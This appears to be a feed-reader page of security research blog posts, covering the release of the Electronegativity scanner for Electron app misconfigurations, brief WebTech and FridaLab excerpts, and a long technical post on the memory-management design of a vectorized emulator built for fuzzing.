Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

WebTech, identify technologies used on websites

8 March 2019 at 00:37
Introduction We’re very proud to release WebTech as open-source software. WebTech is a Python software that can identify web technologies by visiting a given website, parsing a single response file or replaying a request described in a text file. This way you can have reproducible results and minimize the requests you need to make to a target website. The RECON phase in a Penetration Test is one among the most important ones.

FridaLab – Writeup

4 February 2019 at 15:20
Today I solved FridaLab, a playground Android application for playing with Frida and testing your skills. The app is made of various challenges, with increasing difficulty, that will guide you through Frida’s potential. This is a writeup with solutions to the challenges in FridaLab. We suggest the reader to take a look at it and try to solve it by itself before reading further. In this writeup we will assume that the reader has a working environment with frida-server already installed on the Android device and frida-tools installed on the PC as well, since we will not cover those topics.

Electronegativity is finally out!

23 January 2019 at 23:00

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further the MMU design used here also is designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has it’s own permission bits. Since vectorized emulation is meant for fuzzing it’s also important that the memory state can quickly be restored to the original state quickly so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access it’s own memory, and it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement for my hypervisor so it was natural for me to just copy it over the QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages and reduces the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x1337000. No translation, not base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve it’s ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further page heap has the requested size in the metadata so we can get perfect byte-level applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VM’s memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However the common case most memory is accessed at the same address, and memory does not straddle a 8-byte boundary. It’s worth it.

For reference the cost of a single load instruction vmovdqa64 is about 4-5 cycles, where a vpgatherqq load is 20-30 cycles. Unless memory is so frequently accessed from different addresses and straddling 8-byte boundaries it is always worth interleaving.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address Host Address Qword 1 Qword 2 Qword 3 Qword 8
0x0000 0x0000 1 2 3 33
0x0008 0x0040 32 74 55 45
0x0010 0x0080 24 24 24 24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naive as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needing for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets, it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearally and potentially get a speedup by the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

Simplified to 4 lanes instead of 8 MMU layout

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW it is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in it’s MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect of only memory that is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your hearts desire.

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains it’s CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible from bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

